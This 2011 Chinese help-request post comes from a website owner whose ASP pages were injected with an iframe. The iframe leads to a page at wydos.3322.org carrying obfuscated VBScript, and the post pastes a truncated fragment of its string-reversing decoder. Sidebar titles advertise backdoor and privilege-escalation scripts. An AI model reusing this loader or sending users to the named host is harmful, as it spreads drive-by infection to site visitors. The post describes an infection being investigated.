Trojan.DL.VBS.Agent.r 脚本病毒 ASP解密
2011年04月18日
Trojan.DL.VBS.Agent.r 脚本病毒
问题:1.Trojan.DL.VBS.Agent.r 的情况
2.ASP解密 怎么用?
描述:
打开我的网站时,瑞星显示有这种病毒Trojan.DL.VBS.Agent.r
病毒位置:C:\Documents and Settings\Administrator.MS-E496B8708F13\Local Settings\Temporary Internet Files\Content.IE5
\ALNSDGZI xx[1].htm
下载整个网站,用最新瑞星查不出来。
后在网站的所有的index.asp(包括子目录)中都发现:代码中最后位置加了这么句代码:
打开这个页只有个 统计。又iframe了。
最后找到这个页:http://wydos.3322.org/kehu.htm
代码如下:(加密的)
hu="琳 >tpircs/""tpircSBV""=egaugnal tpircs "琳" then
temp = Mid(cc, i, 1) + temp
else
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
document.write(UnEncode(hu))
下载WEBfree_web.exe 解密却不能运行。没有装VB。装个VB运行库还是少文件:richtx32.ocx
网上baidu了下,没有找到。
有高人在的请指点!小弟先谢了。
发表评论
-
自动生成XIP映像文件的一种方法
2012-01-20 10:02 688自动生成XIP映像文件的一种方法 2011年03月04日 ... -
自动生成 MultiTestManager 的执行文件mtm
2012-01-20 10:02 690自动生成 MultiTestManager 的执行文件mtm ... -
批处理隐藏打开IE
2012-01-20 10:02 805批处理隐藏打开IE 2010年06月25日 bat 复 ... -
自动跳转上/下一页的脚本
2012-01-20 10:02 631自动跳转上/下一页的脚本 2010年10月19日 突然觉 ... -
WIN下用exp备份保存最近N天方案
2012-01-20 10:02 733WIN下用exp备份保存最近N天方案 2010年06月03日 ... -
[黑客必备] Vbs脚本实现radmin终极后门 [工具打包]
2012-01-19 15:04 978[黑客必备] Vbs脚本实现radmin终极后门 [工具打包] ... -
VBS脚本得到CPU使用率,硬盘使用率和内存使用率
2012-01-19 15:03 585VBS脚本得到CPU使用率,硬盘使用率和内存使用率 2011 ... -
VBS脚本
2012-01-19 15:03 644VBS脚本 2011年06月30日 我用VBS写的往EX ... -
xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集
2012-01-19 15:03 589xp、2003开3389+非net创建管理用户+Shift后门 ... -
总体上说,是c++ builder胜于VC++,DELPHI是最好
2012-01-17 04:50 829总体上说,是c++ builder胜 ... -
Qt 学习笔记 --Qt SDK 的下载安装与配置
2012-01-17 04:50 606Qt 学习笔记 --Qt SDK 的下 ... -
我的文件17/1
2012-01-17 04:50 434我的文件17/1 2010年07月26日 Protel技 ... -
2011年计算机三级考试PC技术知识要点(32)
2012-01-17 04:50 4522011年计算机三级考试PC ... -
一个整人的vbs脚本(yzy原创)
2012-01-16 03:41 796一个整人的vbs脚本(yzy原 ... -
VBS脚本病毒刷QQ聊天屏
2012-01-16 03:41 1115VBS脚本病毒刷QQ聊天屏 2009年09月30日 su ... -
脚本操作注册表(vb.vbs)
2012-01-16 03:41 638脚本操作注册表(vb.vbs) 2009年06月05日 ... -
对比删除文件的VBS脚本
2012-01-16 03:41 538对比删除文件的VBS脚本 2011年04月02日 一段对 ... -
列出所有的WMI对象方法和属性vbs脚本
2012-01-16 03:40 1310列出所有的WMI对象方法和属性vbs脚本 2009年10月2 ...
相关推荐
安铁诺Trojan.VBS.StartPage.dy专杀 V2010.exe。针对1KB病毒
俄罗斯安全软件Dr.Web,Trojan. Plastix木马感染文件解除工具plstfix
Trojan专杀工具,用着真不错;我在网上找了好长时间才长到的,愿意与大家一块来分享.另外,本人是教育行业的,分享一个好的英语资料下载站:http://www.51tjw.com
RakhniDecryptor,即卡巴斯基Rakhni勒索病毒解密工具,可以解密Rakhni在内的15种勒索病毒软件,其中还包括一款安卓勒索软件"Trojan-Ransom.AndroidOS.Pletor",如果你的电脑或安卓手机感染了勒索病毒,可以使用该...
俄罗斯安全软件大蜘蛛Dr.Web,木马解锁工具.
敲诈者木马程序以敲诈勒索钱财为目的,使得感染该木马的计算机用户系统中的指定数据文件被恶意隐藏,造成用户数据丢失。截至目前为止,在国内已经出现了因感染该木马程序而导致计算机系统数据文件丢失的情况。...
我的电脑让学生插了一下U盘,结果电脑出现中毒现象(变慢、经常蓝屏、出错、自动重启),一查是染上了 假冒腾迅TXPLATFORM.EXE 的U盘病毒,属于 Trojan.Generic.Is.536802,此文介绍查杀方法
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
RECYCLER.exe变种,GHOST.PIF变种,KPE.exe(EKS.exe) Trojan.DL.VB.nua,services.exe变种,sysauto.exe变种,myserver变种,pegefile.pif(Trojan.PSW.Win32.Agent.mk), autorun.exe (Worm.Win32.Agent.h)等
js.scob.trojan
2020年trojan最新windows64客户端
通过对 “冰河”、 “蓝色火焰”、 “BO”、 “广外女生”、 “黑洞”、 “网结”病毒(Worm.Plexus.b)、 “将死者”病毒(Worm.Gone.38912)、 “恶鹰”病毒(Worm.Beagle)、 “网络天空”病毒(Worm.NetSky)、传奇叛逆...
NULL 博文链接:https://polygoncell.iteye.com/blog/733264
针对Trojan-Dropper.Win32.Dropkit.a病毒,清除所需要的工具包,包括金山反间谍2007、PowerRmv、sreng2.5
RannohDecryptor是卡巴斯基推出的一个Rannoh勒索病毒解密工具,可以解密Rannoh在内的7款勒索软件加密的文件,包括Polyglot、Rannoh、AutoIt、Fury、Crybola、Cryakl以及CryptXXX,您的电脑感染了勒索病毒,重要文件...
Trojan is a stable and efficient mobile lightweight log SDK that not only records general logs, such as Http, power changes, component life cycles, but also records the definition of the log, which it...
新增106个新U盘类病毒的查杀,其中包括autorun.vbs system.exe Trojan.Win32.GameOlx.ir;BoyFine Worm-Script.VBS.Autorun.bc;nar.vbs Worm.Script.VBS.7474;.MS32DLL.dll.exe..VBs Worm.Script.VBS.Autorun.a;...
IDA脚本解密Zbot示例中的加密字符串 Zelix Klassmaster字符串解密器 Gen4字符串解密器Backdoor.Miniduke!gen4 Trojan.Netweird记录的密钥解密器 分析感染Trojan.Ransomlock.AP(Trojan.Ransomlk.AP!inf)的Advapi...
可查杀最新木马,主要用于查杀Trojan.Malscript!html等易中木马